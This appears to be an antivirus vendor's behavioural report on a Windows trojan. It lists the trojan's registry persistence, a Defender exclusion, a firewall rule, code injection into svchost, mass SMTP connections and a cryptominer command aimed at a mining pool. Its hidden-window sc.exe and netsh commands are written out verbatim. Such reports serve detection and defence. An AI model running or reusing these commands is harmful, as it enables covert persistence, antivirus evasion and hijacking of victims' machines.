Technical Information
To ensure autorun and distribution
Creates the following services
- [<HKLM>\System\CurrentControlSet\Services\yjtntbbw] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\yjtntbbw] 'ImagePath' = '%WINDIR%\SysWOW64\yjtntbbw\bbagrfmp.exe /d"<Full path to file>"'
- [<HKLM>\SYSTEM\CurrentControlSet\services\yjtntbbw] 'ImagePath' = '%WINDIR%\SysWOW64\yjtntbbw\bbagrfmp.exe'
Malicious functions
To complicate detection of its presence in the operating system,
adds antivirus exclusion with following registry keys:
- [<HKLM>\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\SysWOW64\yjtntbbw' = '00000000'
Executes the following
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul
Injects code into
the following system processes:
- %WINDIR%\syswow64\svchost.exe
Modifies file system
Creates the following files
- %TEMP%\bbagrfmp.exe
- %WINDIR%\syswow64\config\systemprofile:.repos
Moves the following files
- from %TEMP%\bbagrfmp.exe to %WINDIR%\syswow64\yjtntbbw\bbagrfmp.exe
Deletes itself.
Network activity
Connects to
- 'mt##.##0.yahoodns.net':25
- 'alt1.gmail-smtp-in.l.google.com':25
- 'ma##.#aycomelec.com':25
- 'et###.#ail.tiscali.it':25
- 'mx###.##il.am0.yahoodns.net':25
- '14#.#6.108.92':487
- 'mx###03.web.de':25
- 'mx.###zta.onet.pl':25
- 'mx.###mfilter.io':25
- 'mx#.#anmail.net':25
- 'ma##.#luetie.com':25
- 'aspmx.l.google.com':25
- 'mx#.slc.dz':25
- 'mx#.##antel.net.om':25
- 'mx#.##il.icloud.com':25
- 'a3#####03.direcpc.com':25
- 'mx#.#otmail.com':25
- 'mx#.#s4all.nl':25
- 'eu#.###.#rotection.outlook.com':25
- 'hk####1.hknet.com':25
- 'mx#.##rthlink.net':25
- 'mx#####.ppe-hosted.com':25
- 'pr####.provo.novell.com':25
- 'alt3.gmail-smtp-in.l.google.com':25
- 'alt4.gmail-smtp-in.l.google.com':25
- 'gmail-smtp-in.l.google.com':25
- 'mx.##stlink.ca':25
- 'sm####n.orange.fr':25
- 'fp##.mail.dk':25
- 'alt2.gmail-smtp-in.l.google.com':25
- 'sm##.##cureserver.net':25
- 'no#####.centralva.net':25
- 'mx######b2d01.pphosted.com':25
- 'ig#.apc.org':25
- 'mx.###mabazita.com':25
TCP
HTTP GET requests
- http://www.google.com/
UDP
- DNS ASK mi##########m.mail.protection.outlook.com
- DNS ASK di###way.com
- DNS ASK mx#.#s4all.nl
- DNS ASK xs##ll.nl
- DNS ASK ig#.apc.org
- DNS ASK wc##od.com
- DNS ASK co##nd.com
- DNS ASK mx.##stlink.ca
- DNS ASK dc##et.com
- DNS ASK uk.#bm.com
- DNS ASK no#####.centralva.net
- DNS ASK ra###melec.com
- DNS ASK a3#####03.direcpc.com
- DNS ASK sc#####biomedtech.com
- DNS ASK ma##.tele.dk
- DNS ASK sm####n.orange.fr
- DNS ASK or##ge.fr
- DNS ASK alt4.gmail-smtp-in.l.google.com
- DNS ASK ho##ail.fr
- DNS ASK pr####.provo.novell.com
- DNS ASK no##ll.com
- DNS ASK hk####1.hknet.com
- DNS ASK hk##t.com
- DNS ASK iw##et.com
- DNS ASK aspmx.l.google.com
- DNS ASK ma##.#aycomelec.com
- DNS ASK mx.###mabazita.com
- DNS ASK gr###bazita.com
- DNS ASK wa##doo.fr
- DNS ASK mx#.##il.icloud.com
- DNS ASK ic##ud.com
- DNS ASK ho##ail.de
- DNS ASK mx#.##antel.net.om
- DNS ASK om###el.net.om
- DNS ASK mx#.slc.dz
- DNS ASK sl#.dz
- DNS ASK es###r.edu.co
- DNS ASK mx.###mfilter.io
- DNS ASK da###main.dk
- DNS ASK ma##.#luetie.com
- DNS ASK ra###link.com
- DNS ASK ya##o.fr
- DNS ASK mx#.#anmail.net
- DNS ASK ha##ail.net
- DNS ASK mx.###zta.onet.pl
- DNS ASK vp.pl
- DNS ASK mx###03.web.de
- DNS ASK we#.de
- DNS ASK ya##o.sk
- DNS ASK google.com
- DNS ASK sm##.##cureserver.net
- DNS ASK ya##o.com
- DNS ASK sp######er.amtservices.it
- DNS ASK co###rziosd.it
- DNS ASK 19#.###.##1.95.sbl-xbl.spamhaus.org
- DNS ASK sm####n.inwind.it
- DNS ASK in##nd.it
- DNS ASK on##ble.dk
- DNS ASK ma###0.sp3.com
- DNS ASK sp#.com
- DNS ASK alt2.gmail-smtp-in.l.google.com
- DNS ASK sp#.##kura.ne.jp
- DNS ASK 19#.###.#11.95.cbl.abuseat.org
- DNS ASK gm##l.com
- DNS ASK mx###.##il.am0.yahoodns.net
- DNS ASK ya##o.es
- DNS ASK et###.#ail.tiscali.it
- DNS ASK 19#.###.#11.95.zen.spamhaus.org
- DNS ASK fp##.mail.dk
- DNS ASK 19#.###.#11.95.bl.spamcop.net
- DNS ASK ma#l.dk
- DNS ASK 19#.###.#11.95.dnsbl.sorbs.net
- DNS ASK alt3.gmail-smtp-in.l.google.com
- DNS ASK mx#.#otmail.com
- DNS ASK gmail-smtp-in.l.google.com
- DNS ASK mt##.##0.yahoodns.net
- DNS ASK 19#.###.211.95.in-addr.arpa
- DNS ASK ya##o.dk
- DNS ASK ti##ali.it
- DNS ASK cd#.ca
- DNS ASK ho##ail.se
- DNS ASK ti###linet.it
- DNS ASK mx#.##rthlink.net
- DNS ASK ea###link.net
- DNS ASK sm####n.libero.it
- DNS ASK li##ro.it
- DNS ASK wi#.edu
- DNS ASK ip#.#c.utah.edu
- DNS ASK ch##.utah.edu
- DNS ASK ma###.nyumc.org
- DNS ASK po####l.med.nyu.edu
- DNS ASK em###.uophx.edu
- DNS ASK mx#####.ppe-hosted.com
- DNS ASK sp##77.com
- DNS ASK sp##rh.com
- DNS ASK se####.atlanticgate.com
- DNS ASK sp#.pt
- DNS ASK mx#.##stinger.ro
- DNS ASK ca###usiness.it
- DNS ASK mx######b2d01.pphosted.com
- DNS ASK us.#bm.com
- DNS ASK po####.webtech.pl
- DNS ASK sp##kk.com
- DNS ASK eu#.###.#rotection.outlook.com
- DNS ASK alt1.gmail-smtp-in.l.google.com
- DNS ASK ec#.it
Miscellaneous
Creates and executes the following
- '%WINDIR%\syswow64\yjtntbbw\bbagrfmp.exe' /d"<Full path to file>"
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\yjtntbbw\' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\bbagrfmp.exe" %WINDIR%\SysWOW64\yjtntbbw\' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' create yjtntbbw binPath= "%WINDIR%\SysWOW64\yjtntbbw\bbagrfmp.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' description yjtntbbw "wifi internet conection"' (with hidden window)
- '%WINDIR%\syswow64\sc.exe' start yjtntbbw' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="%WINDIR%\SysWOW64\svchost.exe" enable=yes>nul' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\cmd.exe' /C mkdir %WINDIR%\SysWOW64\yjtntbbw\
- '%WINDIR%\syswow64\cmd.exe' /C move /Y "%TEMP%\bbagrfmp.exe" %WINDIR%\SysWOW64\yjtntbbw\
- '%WINDIR%\syswow64\sc.exe' create yjtntbbw binPath= "%WINDIR%\SysWOW64\yjtntbbw\bbagrfmp.exe /d\"<Full path to file>\"" type= own start= auto DisplayName= "wifi support"
- '%WINDIR%\syswow64\sc.exe' description yjtntbbw "wifi internet conection"
- '%WINDIR%\syswow64\sc.exe' start yjtntbbw
- '%WINDIR%\syswow64\svchost.exe'
- '%WINDIR%\syswow64\svchost.exe' -a cryptonight-heavy -o stratum+tcp://185.16.41.185:8087 -u w1 -p x --nicehash --safe